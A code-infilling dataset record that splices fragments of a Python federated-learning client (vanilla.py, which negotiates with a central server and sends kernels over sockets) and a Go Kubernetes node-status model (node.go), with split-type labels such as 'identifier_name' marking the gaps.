#dumped = json.dumps( self.kernel.tolist() ) # THIS line is crashing the system (for size 10k)
dumped = serialize( self.kernel )
self.verbose("Total serial dump: {} bytes".format(len(dumped)))
smsg.send( self._msocket, dumped ) #json dump and send the array
# await confirmation
repmsg = self._msocket.recv(4)
if( repmsg.decode('utf-8') == "ACKN" ):
# proceed
if( self.hasTarget ):
# dump the target_train to bytes and send it on over socket
dumped = serialize( self._npdc.get(side='target',batch='train'))
smsg.send( self._msocket, dumped)
# await for alpha
self.info("All Kernels sent. Awaiting central response.")
rcv = smsg.recv( self._msocket )
if(rcv != None):
try:
if( rcv.decode('utf-8') == 'ABRT'):
self.error("Abort request by central.")
self.hasAlpha = False
except UnicodeDecodeError :
self.verbose("Unicode decode failed. Proceeding with deserialization")
self._mdistalpha = deserialize(rcv)
self.info("Distributed alpha received.")
self.hasAlpha=True
self.recover_weights() # perform weight recovery
else:
self.error("rcv is null. Receiving error _mdistalpha")
self.hasAlpha = False
else:
#failed
self.error("Failed to receive ACKN from host. Terminating conntrain")
self.hasAlpha = False
else:
self.error("This donor has not synchronized the params with the central,\
please run negotiate( addr ) first !")
self.hasAlpha = False
return self.hasAlpha
def conntest(self):
'''conntest should begin connection with the central, send in the
_mDmat_train and (if it has the target) _mTvct_train. await response
from server which it will return the error rating of the model
RETURNS True upon No errors. False otherwise'''
if( self.isTrained ):
aggregate = self._npdc.get( side="data",batch="test").dot( self._mweights )
self.verbose("Sending test prediction to central",aggregate.shape)
#self.raw( aggregate )
dumped = serialize( aggregate )
smsg.send( self._msocket, dumped )
repmsg = self._msocket.recv(4)
if( repmsg.decode('utf-8') == "ACKN" ):
#proceed
if( self.hasTarget ):
# dump the target_test to bytes and send it on over socket
dumped = serialize( self._npdc.get(side='target',batch='test'))
smsg.send( self._msocket, dumped )
#await for test results
self.info("All Aggregates sent. Awaiting results.")
rcv = smsg.recv( self._msocket )
if(rcv != None):
if( rcv.decode('utf-8') == 'ABRT'):
self.error("Abort request by central.")
else:
self._mres = json.loads(rcv)
self.verbose("Received DML test results:")
self.info("MSE:", self._mres.get("mse"))
self.info("R2S:", self._mres.get("r2s"))
return True
else:
self.error("rcv is null. Receiving error on _mres")
else:
self.error("Failed to receive ACKN from host. Terminating conntest")
else:
self.error("Weights not available. Is the donor trained ?")
return False
def connpred(self):
#TODO: figure out how to implement this
pass
def recover_weights(self, colmajor=False):
'''recovers the weight'''
if( self.hasAlpha ):
ool = (1/self._mnegform.primary['rrlambda'])
self.debug("OOL (lval):",ool)
if( type(ool) != float and type(ool) != int):
self.warn("OOL not a float or int")
if( not colmajor ):
self._mweights = ool*self._npdc.get(\
side="data",batch="train").transpose().dot(\
self._mdistalpha)
else:
self._mweights = ool*self._npdc.get(\
side="data",batch="train").dot(\
self._mdistalpha)
if( type(self._mweights) == numpy.ndarray ):
self.isTrained = True
self.info("Weights recovered successfully",self._mweights.shape)
self.debug("Weights array:")
self.raw( self._mweights )
else:
self.isTrained = False
else:
self.isTrained = False
# common functions
def negotiate(self,ahostaddr):
'''start negotation, first sends in the donor's own prepared negform to inform the
central about the number of entries/features, it is expected that _mDmat is read
from a file/stdin before this
@params ahostaddr - a tuple ('localhost',portnumber i.e 8000)'''
_mnegform = NegForm(self) #creates the negotiation form
self.verbose("Negform created. Beginning Negotation...")
try:
negstr = json.dumps(_mnegform.primary) #obtains the primary neg data
self._msocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._msocket.connect( ahostaddr ) #attempting to connect to the host (central)
self.debug("Host connected. Sending negstr")
smsg.send( self._msocket, negstr )
self.debug("Negotiation form sent to central. Awaiting synchronization")
self._mnegform = NegForm( json.loads( smsg.recv( self._msocket ) ) )
self.info("Synchronized form:")
self._mnegform.display()
self.partition_internals( self._mnegform.primary["bsize"] )
self.kernel = self._npdc.computeKernel()
if not type(self.kernel) == numpy.ndarray:
self.warn("Kernel computational error!")
else:
|
except Exception as e:
self.expt(str(e),traceback.format_exc())
finally:
return self.hasNegotiated()
##############################################################################################
# These are common throughout almost all implementation and thus are implemented in the ABC
# updated: migrated from the conceptual class to this.
##############################################################################################
def display_internals(self):
'''invokes a display command to display the internal content using any data controllers'''
if self._npdc is not None:
self._npdc.show()
if self._mnegform is not None:
self._mnegform.display()
def partition_internals(self, s_point):
'''invokes a partition command to perform splitting of the data set into the train/test'''
if self._npdc is not None:
self._npdc.batch(s_point)
else:
self.error("Failed to partition. NPDC is null!")
def normalize_internals(self):
'''perform normalization on the internal dataset, please call partition again'''
if self._npdc is not None:
self._npdc.stdnorm()
else:
| self.verbose("Partitioned and computed the kernel",self.kernel.shape) | conditional_block |
vanilla.py | the most basic operations (generic)
from . import ConceptDonor
import csv, json
import numpy, pandas
import socket
import traceback
from io import StringIO
import traceback
# sklearn
from sklearn import preprocessing
# local
from preproc.aux import serialize, deserialize
import preproc.negotiate as negotiate
import preproc.controller as controller
NPDController = controller.NPDController
NegForm = negotiate.NegForm
import pyioneer.network.tcp.smsg as smsg
class VanillaDonor(ConceptDonor):
# dimension of the target. for multivariate, this > 1
tdim = 1
compd = numpy.double
def __init__(self,filename,ahasTarget, htype, skipc = 0, adelimiter=';', aquotechar ='"',
verbose=False, debug=False,owarn=False):
super().__init__(verbose=verbose,debug=debug)
'''creates the vanilla donor by reading in a file, filles the file
up and will read based on what the donor is created as (hasTarget or no?)'''
self._npdc = NPDController(verbose,debug,owarn)
self.hasTarget = ahasTarget
self._npdc.read( filename, ahasTarget,htype, skipc = skipc, adelimiter = adelimiter,
aquotechar = aquotechar)
# required implementations (the constructor must read in to fill up _mDmat, and
# possibly _mTvct if it hasTarget. the hasTarget must also be set to True if
# the donor truly possess the targets
def conntrain(self):
'''conntrain should begin connection with the central, send in the
_mDmat_train and (if it has the target) _mTvct_train. await response
from server and fill in the received alpha to _mdist_alpha'''
if( self.hasNegotiated() ):
self.verbose("Sending kernel to central")
#dumped = json.dumps( self.kernel.tolist() ) # THIS line is crashing the system (for size 10k)
dumped = serialize( self.kernel )
self.verbose("Total serial dump: {} bytes".format(len(dumped)))
smsg.send( self._msocket, dumped ) #json dump and send the array
# await confirmation
repmsg = self._msocket.recv(4)
if( repmsg.decode('utf-8') == "ACKN" ):
# proceed
if( self.hasTarget ):
# dump the target_train to bytes and send it on over socket
dumped = serialize( self._npdc.get(side='target',batch='train'))
smsg.send( self._msocket, dumped)
# await for alpha
self.info("All Kernels sent. Awaiting central response.")
rcv = smsg.recv( self._msocket )
if(rcv != None):
try:
if( rcv.decode('utf-8') == 'ABRT'):
self.error("Abort request by central.")
self.hasAlpha = False
except UnicodeDecodeError :
self.verbose("Unicode decode failed. Proceeding with deserialization")
self._mdistalpha = deserialize(rcv)
self.info("Distributed alpha received.")
self.hasAlpha=True
self.recover_weights() # perform weight recovery
else:
self.error("rcv is null. Receiving error _mdistalpha")
self.hasAlpha = False
else:
#failed
self.error("Failed to receive ACKN from host. Terminating conntrain")
self.hasAlpha = False
else:
self.error("This donor has not synchronized the params with the central,\
please run negotiate( addr ) first !")
self.hasAlpha = False
return self.hasAlpha
def conntest(self):
'''conntest should begin connection with the central, send in the
_mDmat_train and (if it has the target) _mTvct_train. await response
from server which it will return the error rating of the model
RETURNS True upon No errors. False otherwise'''
if( self.isTrained ):
aggregate = self._npdc.get( side="data",batch="test").dot( self._mweights )
self.verbose("Sending test prediction to central",aggregate.shape)
#self.raw( aggregate )
dumped = serialize( aggregate )
smsg.send( self._msocket, dumped )
repmsg = self._msocket.recv(4)
if( repmsg.decode('utf-8') == "ACKN" ):
#proceed
if( self.hasTarget ):
# dump the target_test to bytes and send it on over socket
dumped = serialize( self._npdc.get(side='target',batch='test'))
smsg.send( self._msocket, dumped )
#await for test results
self.info("All Aggregates sent. Awaiting results.")
rcv = smsg.recv( self._msocket )
if(rcv != None):
if( rcv.decode('utf-8') == 'ABRT'):
self.error("Abort request by central.")
else:
self._mres = json.loads(rcv)
self.verbose("Received DML test results:")
self.info("MSE:", self._mres.get("mse"))
self.info("R2S:", self._mres.get("r2s"))
return True
else:
self.error("rcv is null. Receiving error on _mres")
else:
self.error("Failed to receive ACKN from host. Terminating conntest")
else:
self.error("Weights not available. Is the donor trained ?")
return False
def connpred(self):
#TODO: figure out how to implement this
pass
def recover_weights(self, colmajor=False):
'''recovers the weight'''
if( self.hasAlpha ):
ool = (1/self._mnegform.primary['rrlambda'])
self.debug("OOL (lval):",ool)
if( type(ool) != float and type(ool) != int):
self.warn("OOL not a float or int")
if( not colmajor ):
self._mweights = ool*self._npdc.get(\
side="data",batch="train").transpose().dot(\
self._mdistalpha)
else:
self._mweights = ool*self._npdc.get(\
side="data",batch="train").dot(\
self._mdistalpha)
if( type(self._mweights) == numpy.ndarray ):
self.isTrained = True
self.info("Weights recovered successfully",self._mweights.shape)
self.debug("Weights array:")
self.raw( self._mweights )
else:
self.isTrained = False
else:
self.isTrained = False
# common functions
def negotiate(self,ahostaddr):
'''start negotation, first sends in the donor's own prepared negform to inform the
central about the number of entries/features, it is expected that _mDmat is read
from a file/stdin before this
@params ahostaddr - a tuple ('localhost',portnumber i.e 8000)'''
_mnegform = NegForm(self) #creates the negotiation form
self.verbose("Negform created. Beginning Negotation...")
try:
negstr = json.dumps(_mnegform.primary) #obtains the primary neg data
self._msocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._msocket.connect( ahostaddr ) #attempting to connect to the host (central)
self.debug("Host connected. Sending negstr")
smsg.send( self._msocket, negstr )
self.debug("Negotiation form sent to central. Awaiting synchronization")
self._mnegform = NegForm( json.loads( smsg.recv( self._msocket ) ) )
self.info("Synchronized form:")
self._mnegform.display()
self.partition_internals( self._mnegform.primary["bsize"] )
self.kernel = self._npdc.computeKernel()
if not type(self.kernel) == numpy.ndarray:
self.warn("Kernel computational error!")
else:
self.verbose("Partitioned and computed the kernel",self.kernel.shape)
except Exception as e:
self.expt(str(e),traceback.format_exc())
finally:
return self.hasNegotiated()
##############################################################################################
# These are common throughout almost all implementation and thus are implemented in the ABC
# updated: migrated from the conceptual class to this.
##############################################################################################
def display_internals(self):
|
def partition_internals(self, s_point):
'''invokes a partition command to perform splitting of the data set into the train/test'''
if self._npdc is not None:
self._npdc.batch(s_point)
else:
self.error("Failed to partition. NPDC is null!")
def normalize_internals(self):
'''perform normalization on the internal dataset, please call partition again'''
if self._npdc is not None:
self._npdc.stdnorm()
else:
| '''invokes a display command to display the internal content using any data controllers'''
if self._npdc is not None:
self._npdc.show()
if self._mnegform is not None:
self._mnegform.display() | identifier_body |
vanilla.py | the most basic operations (generic)
from . import ConceptDonor
import csv, json
import numpy, pandas
import socket
import traceback
from io import StringIO
import traceback
# sklearn
from sklearn import preprocessing
# local
from preproc.aux import serialize, deserialize
import preproc.negotiate as negotiate
import preproc.controller as controller
NPDController = controller.NPDController
NegForm = negotiate.NegForm
import pyioneer.network.tcp.smsg as smsg
class VanillaDonor(ConceptDonor):
# dimension of the target. for multivariate, this > 1
tdim = 1
compd = numpy.double
def __init__(self,filename,ahasTarget, htype, skipc = 0, adelimiter=';', aquotechar ='"',
verbose=False, debug=False,owarn=False):
super().__init__(verbose=verbose,debug=debug)
'''creates the vanilla donor by reading in a file, filles the file
up and will read based on what the donor is created as (hasTarget or no?)'''
self._npdc = NPDController(verbose,debug,owarn)
self.hasTarget = ahasTarget
self._npdc.read( filename, ahasTarget,htype, skipc = skipc, adelimiter = adelimiter,
aquotechar = aquotechar)
# required implementations (the constructor must read in to fill up _mDmat, and
# possibly _mTvct if it hasTarget. the hasTarget must also be set to True if
# the donor truly possess the targets
def conntrain(self):
'''conntrain should begin connection with the central, send in the
_mDmat_train and (if it has the target) _mTvct_train. await response
from server and fill in the received alpha to _mdist_alpha'''
if( self.hasNegotiated() ):
self.verbose("Sending kernel to central")
#dumped = json.dumps( self.kernel.tolist() ) # THIS line is crashing the system (for size 10k)
dumped = serialize( self.kernel )
self.verbose("Total serial dump: {} bytes".format(len(dumped)))
smsg.send( self._msocket, dumped ) #json dump and send the array
# await confirmation
repmsg = self._msocket.recv(4)
if( repmsg.decode('utf-8') == "ACKN" ):
# proceed
if( self.hasTarget ):
# dump the target_train to bytes and send it on over socket
dumped = serialize( self._npdc.get(side='target',batch='train'))
smsg.send( self._msocket, dumped)
# await for alpha
self.info("All Kernels sent. Awaiting central response.")
rcv = smsg.recv( self._msocket )
if(rcv != None):
try:
if( rcv.decode('utf-8') == 'ABRT'):
self.error("Abort request by central.")
self.hasAlpha = False
except UnicodeDecodeError :
self.verbose("Unicode decode failed. Proceeding with deserialization")
self._mdistalpha = deserialize(rcv)
self.info("Distributed alpha received.")
self.hasAlpha=True
self.recover_weights() # perform weight recovery
else:
self.error("rcv is null. Receiving error _mdistalpha")
self.hasAlpha = False
else:
#failed
self.error("Failed to receive ACKN from host. Terminating conntrain")
self.hasAlpha = False
else:
self.error("This donor has not synchronized the params with the central,\
please run negotiate( addr ) first !")
self.hasAlpha = False
return self.hasAlpha
def conntest(self):
'''conntest should begin connection with the central, send in the
_mDmat_train and (if it has the target) _mTvct_train. await response
from server which it will return the error rating of the model
RETURNS True upon No errors. False otherwise'''
if( self.isTrained ):
aggregate = self._npdc.get( side="data",batch="test").dot( self._mweights )
self.verbose("Sending test prediction to central",aggregate.shape)
#self.raw( aggregate )
dumped = serialize( aggregate )
smsg.send( self._msocket, dumped )
repmsg = self._msocket.recv(4)
if( repmsg.decode('utf-8') == "ACKN" ):
#proceed
if( self.hasTarget ):
# dump the target_test to bytes and send it on over socket
dumped = serialize( self._npdc.get(side='target',batch='test'))
smsg.send( self._msocket, dumped )
#await for test results
self.info("All Aggregates sent. Awaiting results.")
rcv = smsg.recv( self._msocket )
if(rcv != None):
if( rcv.decode('utf-8') == 'ABRT'):
self.error("Abort request by central.")
else:
self._mres = json.loads(rcv)
self.verbose("Received DML test results:")
self.info("MSE:", self._mres.get("mse"))
self.info("R2S:", self._mres.get("r2s"))
return True
else:
self.error("rcv is null. Receiving error on _mres")
else:
self.error("Failed to receive ACKN from host. Terminating conntest")
else:
self.error("Weights not available. Is the donor trained ?")
return False
def connpred(self):
#TODO: figure out how to implement this
pass
def recover_weights(self, colmajor=False):
'''recovers the weight'''
if( self.hasAlpha ):
ool = (1/self._mnegform.primary['rrlambda'])
self.debug("OOL (lval):",ool)
if( type(ool) != float and type(ool) != int):
self.warn("OOL not a float or int")
if( not colmajor ):
self._mweights = ool*self._npdc.get(\
side="data",batch="train").transpose().dot(\
self._mdistalpha)
else:
self._mweights = ool*self._npdc.get(\
side="data",batch="train").dot(\
self._mdistalpha)
if( type(self._mweights) == numpy.ndarray ):
self.isTrained = True
self.info("Weights recovered successfully",self._mweights.shape)
self.debug("Weights array:")
self.raw( self._mweights )
else:
self.isTrained = False
else:
self.isTrained = False
# common functions
def | (self,ahostaddr):
'''start negotation, first sends in the donor's own prepared negform to inform the
central about the number of entries/features, it is expected that _mDmat is read
from a file/stdin before this
@params ahostaddr - a tuple ('localhost',portnumber i.e 8000)'''
_mnegform = NegForm(self) #creates the negotiation form
self.verbose("Negform created. Beginning Negotation...")
try:
negstr = json.dumps(_mnegform.primary) #obtains the primary neg data
self._msocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._msocket.connect( ahostaddr ) #attempting to connect to the host (central)
self.debug("Host connected. Sending negstr")
smsg.send( self._msocket, negstr )
self.debug("Negotiation form sent to central. Awaiting synchronization")
self._mnegform = NegForm( json.loads( smsg.recv( self._msocket ) ) )
self.info("Synchronized form:")
self._mnegform.display()
self.partition_internals( self._mnegform.primary["bsize"] )
self.kernel = self._npdc.computeKernel()
if not type(self.kernel) == numpy.ndarray:
self.warn("Kernel computational error!")
else:
self.verbose("Partitioned and computed the kernel",self.kernel.shape)
except Exception as e:
self.expt(str(e),traceback.format_exc())
finally:
return self.hasNegotiated()
##############################################################################################
# These are common throughout almost all implementation and thus are implemented in the ABC
# updated: migrated from the conceptual class to this.
##############################################################################################
def display_internals(self):
'''invokes a display command to display the internal content using any data controllers'''
if self._npdc is not None:
self._npdc.show()
if self._mnegform is not None:
self._mnegform.display()
def partition_internals(self, s_point):
'''invokes a partition command to perform splitting of the data set into the train/test'''
if self._npdc is not None:
self._npdc.batch(s_point)
else:
self.error("Failed to partition. NPDC is null!")
def normalize_internals(self):
'''perform normalization on the internal dataset, please call partition again'''
if self._npdc is not None:
self._npdc.stdnorm()
| negotiate | identifier_name |
vanilla.py | performs the most basic operations (generic)
from . import ConceptDonor
import csv, json
import numpy, pandas
import socket
import traceback
from io import StringIO
import traceback
# sklearn
from sklearn import preprocessing
# local
from preproc.aux import serialize, deserialize
import preproc.negotiate as negotiate
import preproc.controller as controller
NPDController = controller.NPDController
NegForm = negotiate.NegForm
import pyioneer.network.tcp.smsg as smsg
class VanillaDonor(ConceptDonor):
# dimension of the target. for multivariate, this > 1
tdim = 1
compd = numpy.double
def __init__(self,filename,ahasTarget, htype, skipc = 0, adelimiter=';', aquotechar ='"',
verbose=False, debug=False,owarn=False):
super().__init__(verbose=verbose,debug=debug)
'''creates the vanilla donor by reading in a file, filles the file
up and will read based on what the donor is created as (hasTarget or no?)'''
self._npdc = NPDController(verbose,debug,owarn)
self.hasTarget = ahasTarget
self._npdc.read( filename, ahasTarget,htype, skipc = skipc, adelimiter = adelimiter,
aquotechar = aquotechar)
# required implementations (the constructor must read in to fill up _mDmat, and
# possibly _mTvct if it hasTarget. the hasTarget must also be set to True if
# the donor truly possess the targets
def conntrain(self):
'''conntrain should begin connection with the central, send in the
_mDmat_train and (if it has the target) _mTvct_train. await response
from server and fill in the received alpha to _mdist_alpha'''
if( self.hasNegotiated() ):
self.verbose("Sending kernel to central")
#dumped = json.dumps( self.kernel.tolist() ) # THIS line is crashing the system (for size 10k)
dumped = serialize( self.kernel )
self.verbose("Total serial dump: {} bytes".format(len(dumped)))
smsg.send( self._msocket, dumped ) #json dump and send the array
# await confirmation
repmsg = self._msocket.recv(4)
if( repmsg.decode('utf-8') == "ACKN" ):
# proceed
if( self.hasTarget ):
# dump the target_train to bytes and send it on over socket
dumped = serialize( self._npdc.get(side='target',batch='train'))
smsg.send( self._msocket, dumped)
# await for alpha
self.info("All Kernels sent. Awaiting central response.")
rcv = smsg.recv( self._msocket )
if(rcv != None):
try:
if( rcv.decode('utf-8') == 'ABRT'):
self.error("Abort request by central.")
self.hasAlpha = False
except UnicodeDecodeError :
self.verbose("Unicode decode failed. Proceeding with deserialization")
self._mdistalpha = deserialize(rcv)
self.info("Distributed alpha received.")
self.hasAlpha=True
self.recover_weights() # perform weight recovery
else:
self.error("rcv is null. Receiving error _mdistalpha") | self.error("Failed to receive ACKN from host. Terminating conntrain")
self.hasAlpha = False
else:
self.error("This donor has not synchronized the params with the central,\
please run negotiate( addr ) first !")
self.hasAlpha = False
return self.hasAlpha
def conntest(self):
'''conntest should begin connection with the central, send in the
_mDmat_train and (if it has the target) _mTvct_train. await response
from server which it will return the error rating of the model
RETURNS True upon No errors. False otherwise'''
if( self.isTrained ):
aggregate = self._npdc.get( side="data",batch="test").dot( self._mweights )
self.verbose("Sending test prediction to central",aggregate.shape)
#self.raw( aggregate )
dumped = serialize( aggregate )
smsg.send( self._msocket, dumped )
repmsg = self._msocket.recv(4)
if( repmsg.decode('utf-8') == "ACKN" ):
#proceed
if( self.hasTarget ):
# dump the target_test to bytes and send it on over socket
dumped = serialize( self._npdc.get(side='target',batch='test'))
smsg.send( self._msocket, dumped )
#await for test results
self.info("All Aggregates sent. Awaiting results.")
rcv = smsg.recv( self._msocket )
if(rcv != None):
if( rcv.decode('utf-8') == 'ABRT'):
self.error("Abort request by central.")
else:
self._mres = json.loads(rcv)
self.verbose("Received DML test results:")
self.info("MSE:", self._mres.get("mse"))
self.info("R2S:", self._mres.get("r2s"))
return True
else:
self.error("rcv is null. Receiving error on _mres")
else:
self.error("Failed to receive ACKN from host. Terminating conntest")
else:
self.error("Weights not available. Is the donor trained ?")
return False
def connpred(self):
#TODO: figure out how to implement this
pass
def recover_weights(self, colmajor=False):
'''recovers the weight'''
if( self.hasAlpha ):
ool = (1/self._mnegform.primary['rrlambda'])
self.debug("OOL (lval):",ool)
if( type(ool) != float and type(ool) != int):
self.warn("OOL not a float or int")
if( not colmajor ):
self._mweights = ool*self._npdc.get(\
side="data",batch="train").transpose().dot(\
self._mdistalpha)
else:
self._mweights = ool*self._npdc.get(\
side="data",batch="train").dot(\
self._mdistalpha)
if( type(self._mweights) == numpy.ndarray ):
self.isTrained = True
self.info("Weights recovered successfully",self._mweights.shape)
self.debug("Weights array:")
self.raw( self._mweights )
else:
self.isTrained = False
else:
self.isTrained = False
# common functions
def negotiate(self,ahostaddr):
'''start negotation, first sends in the donor's own prepared negform to inform the
central about the number of entries/features, it is expected that _mDmat is read
from a file/stdin before this
@params ahostaddr - a tuple ('localhost',portnumber i.e 8000)'''
_mnegform = NegForm(self) #creates the negotiation form
self.verbose("Negform created. Beginning Negotation...")
try:
negstr = json.dumps(_mnegform.primary) #obtains the primary neg data
self._msocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._msocket.connect( ahostaddr ) #attempting to connect to the host (central)
self.debug("Host connected. Sending negstr")
smsg.send( self._msocket, negstr )
self.debug("Negotiation form sent to central. Awaiting synchronization")
self._mnegform = NegForm( json.loads( smsg.recv( self._msocket ) ) )
self.info("Synchronized form:")
self._mnegform.display()
self.partition_internals( self._mnegform.primary["bsize"] )
self.kernel = self._npdc.computeKernel()
if not type(self.kernel) == numpy.ndarray:
self.warn("Kernel computational error!")
else:
self.verbose("Partitioned and computed the kernel",self.kernel.shape)
except Exception as e:
self.expt(str(e),traceback.format_exc())
finally:
return self.hasNegotiated()
##############################################################################################
# These are common throughout almost all implementation and thus are implemented in the ABC
# updated: migrated from the conceptual class to this.
##############################################################################################
def display_internals(self):
'''invokes a display command to display the internal content using any data controllers'''
if self._npdc is not None:
self._npdc.show()
if self._mnegform is not None:
self._mnegform.display()
def partition_internals(self, s_point):
'''invokes a partition command to perform splitting of the data set into the train/test'''
if self._npdc is not None:
self._npdc.batch(s_point)
else:
self.error("Failed to partition. NPDC is null!")
def normalize_internals(self):
'''perform normalization on the internal dataset, please call partition again'''
if self._npdc is not None:
self._npdc.stdnorm()
else:
| self.hasAlpha = False
else:
#failed | random_line_split |
node.go | json:"host_name"`
CreateTime time.Time `json:"create_time"`
InternalIP string `json:"internal_ip"`
ExternalIP string `json:"external_ip"`
RootPass string `json:"root_pass,omitempty"`
KeyPath string `json:"key_path,omitempty"` //Management node key file path
AvailableMemory int64 `json:"available_memory"`
AvailableCPU int64 `json:"available_cpu"`
Mode string `json:"mode"`
Role HostRule `json:"role"` //compute, manage, storage, gateway
Status string `json:"status"`
Labels map[string]string `json:"labels"` // system labels
CustomLabels map[string]string `json:"custom_labels"` // custom labels
Unschedulable bool `json:"unschedulable"` // Settings
PodCIDR string `json:"podCIDR"`
NodeStatus NodeStatus `json:"node_status"`
}
//Resource
type Resource struct {
CPU int `json:"cpu"`
MemR int `json:"mem"`
}
// NodePodResource -
type NodePodResource struct {
AllocatedResources `json:"allocatedresources"`
Resource `json:"allocatable"`
}
// AllocatedResources -
type AllocatedResources struct {
CPURequests int64
CPULimits int64
MemoryRequests int64
MemoryLimits int64
MemoryRequestsR string
MemoryLimitsR string
CPURequestsR string
CPULimitsR string
}
//NodeStatus
type NodeStatus struct {
//worker maintenance
Version string `json:"version"`
//worker maintenance example: unscheduler, offline
//Initiate a recommendation operation to the master based on the node state
AdviceAction []string `json:"advice_actions"`
//worker maintenance
Status string `json:"status"` //installed running offline unknown
//master maintenance
CurrentScheduleStatus bool `json:"current_scheduler"`
//master maintenance
NodeHealth bool `json:"node_health"`
//worker maintenance
NodeUpdateTime time.Time `json:"node_update_time"`
//master maintenance
KubeUpdateTime time.Time `json:"kube_update_time"`
//worker maintenance node progress down time
LastDownTime time.Time `json:"down_time"`
//worker and master maintenance
Conditions []NodeCondition `json:"conditions,omitempty"`
//master maintenance
KubeNode *v1.Node
//worker and master maintenance
NodeInfo NodeSystemInfo `json:"nodeInfo,omitempty" protobuf:"bytes,7,opt,name=nodeInfo"`
}
//UpdateK8sNodeStatus update kato node status by k8s node
func (n *HostNode) UpdateK8sNodeStatus(k8sNode v1.Node) {
status := k8sNode.Status
n.UpdataK8sCondition(status.Conditions)
n.NodeStatus.NodeInfo = NodeSystemInfo{
MachineID: status.NodeInfo.MachineID,
SystemUUID: status.NodeInfo.SystemUUID,
BootID: status.NodeInfo.BootID,
KernelVersion: status.NodeInfo.KernelVersion,
OSImage: status.NodeInfo.OSImage,
OperatingSystem: status.NodeInfo.OperatingSystem,
ContainerRuntimeVersion: status.NodeInfo.ContainerRuntimeVersion,
Architecture: status.NodeInfo.Architecture,
}
}
// MergeLabels merges custom lables into labels.
func (n *HostNode) MergeLabels() map[string]string {
// TODO: Parallel
labels := make(map[string]string, len(n.Labels)+len(n.CustomLabels))
// copy labels
for k, v := range n.Labels {
labels[k] = v
}
for k, v := range n.CustomLabels {
if _, ok := n.Labels[k]; !ok {
labels[k] = v
}
}
return labels
}
// NodeSystemInfo is a set of ids/uuids to uniquely identify the node.
type NodeSystemInfo struct {
// MachineID reported by the node. For unique machine identification
// in the cluster this field is preferred. Learn more from man(5)
// machine-id: http://man7.org/linux/man-pages/man5/machine-id.5.html
MachineID string `json:"machineID"`
// SystemUUID reported by the node. For unique machine identification
// MachineID is preferred. This field is specific to Red Hat hosts
// https://access.redhat.com/documentation/en-US/Red_Hat_Subscription_Management/1/html/RHSM/getting-system-uuid.html
SystemUUID string `json:"systemUUID"`
// Boot ID reported by the node.
BootID string `json:"bootID" protobuf:"bytes,3,opt,name=bootID"`
// Kernel Version reported by the node from 'uname -r' (e.g. 3.16.0-0.bpo.4-amd64).
KernelVersion string `json:"kernelVersion" `
// OS Image reported by the node from /etc/os-release (e.g. Debian GNU/Linux 7 (wheezy)).
OSImage string `json:"osImage"`
// ContainerRuntime Version reported by the node through runtime remote API (e.g. docker://1.5.0).
ContainerRuntimeVersion string `json:"containerRuntimeVersion"`
// The Operating System reported by the node
OperatingSystem string `json:"operatingSystem"`
// The Architecture reported by the node
Architecture string `json:"architecture"`
MemorySize uint64 `json:"memorySize"`
NumCPU int64 `json:"cpu_num"`
}
const (
//Running node running status
Running = "running"
//Offline node offline status
Offline = "offline"
//Unknown node unknown status
Unknown = "unknown"
//Error node error status
Error = "error"
//Init node init status
Init = "init"
//InstallSuccess node install success status
InstallSuccess = "install_success"
//InstallFailed node install failure status
InstallFailed = "install_failed"
//Installing node installing status
Installing = "installing"
//NotInstalled node not install status
NotInstalled = "not_installed"
)
//Decode - decode node info
func (n *HostNode) Decode(data []byte) error {
if err := ffjson.Unmarshal(data, n); err != nil {
logrus.Error("decode node info error:", err.Error())
return err
}
return nil
}
//NodeList
type NodeList []*HostNode
func (list NodeList) Len() int {
return len(list)
}
func (list NodeList) Less(i, j int) bool {
return list[i].InternalIP < list[j].InternalIP
}
func (list NodeList) Swap(i, j int) {
var temp = list[i]
list[i] = list[j]
list[j] = temp
}
//GetNodeFromKV - parse node information from etcd
func GetNodeFromKV(kv *mvccpb.KeyValue) *HostNode {
var node HostNode
if err := ffjson.Unmarshal(kv.Value, &node); err != nil {
logrus.Error("parse node info error:", err.Error())
return nil
}
return &node
}
//UpdataK8sCondition - update the status of the k8s node to the kato node
func (n *HostNode) UpdataK8sCondition(conditions []v1.NodeCondition) {
for _, con := range conditions {
var rbcon NodeCondition
if NodeConditionType(con.Type) == "Ready" {
rbcon = NodeCondition{
Type: KubeNodeReady,
Status: ConditionStatus(con.Status),
LastHeartbeatTime: con.LastHeartbeatTime.Time,
LastTransitionTime: con.LastTransitionTime.Time,
Reason: con.Reason,
Message: con.Message,
}
} else {
if con.Status != v1.ConditionFalse {
rbcon = NodeCondition{
Type: KubeNodeReady,
Status: ConditionFalse,
LastHeartbeatTime: con.LastHeartbeatTime.Time,
LastTransitionTime: con.LastTransitionTime.Time,
Reason: con.Reason,
Message: con.Message,
}
}
}
n.UpdataCondition(rbcon)
}
}
//DeleteCondition
func (n *HostNode) DeleteCondition(types ...NodeConditionType) {
for _, t := range types {
for i, c := range n.NodeStatus.Conditions {
if c.Type.Compare(t) {
n.NodeStatus.Conditions = append(n.NodeStatus.Conditions[:i], n.NodeStatus.Conditions[i+1:]...)
break
}
}
}
}
// UpdateReadyStatus
func (n *HostNode) UpdateReadyStatus() {
var status = ConditionTrue
var Reason, Message string
for _, con := range n.NodeStatus.Conditions {
if con.Status != ConditionTrue && con.Type != "" && con.Type != NodeReady {
logrus.Debugf("because %s id false, will set node %s(%s) health is false", con.Type, n.ID, n.InternalIP)
status = ConditionFalse
Reason = con.Reason
Message = con.Message
break
}
}
n.GetAndUpdateCondition(NodeReady, status, Reason, Message)
}
//GetCondition
func (n *HostNode) | GetCondition | identifier_name | |
node.go | status.NodeInfo.MachineID,
SystemUUID: status.NodeInfo.SystemUUID,
BootID: status.NodeInfo.BootID,
KernelVersion: status.NodeInfo.KernelVersion,
OSImage: status.NodeInfo.OSImage,
OperatingSystem: status.NodeInfo.OperatingSystem,
ContainerRuntimeVersion: status.NodeInfo.ContainerRuntimeVersion,
Architecture: status.NodeInfo.Architecture,
}
}
// MergeLabels merges custom lables into labels.
func (n *HostNode) MergeLabels() map[string]string {
// TODO: Parallel
labels := make(map[string]string, len(n.Labels)+len(n.CustomLabels))
// copy labels
for k, v := range n.Labels {
labels[k] = v
}
for k, v := range n.CustomLabels {
if _, ok := n.Labels[k]; !ok {
labels[k] = v
}
}
return labels
}
// NodeSystemInfo is a set of ids/uuids to uniquely identify the node.
type NodeSystemInfo struct {
// MachineID reported by the node. For unique machine identification
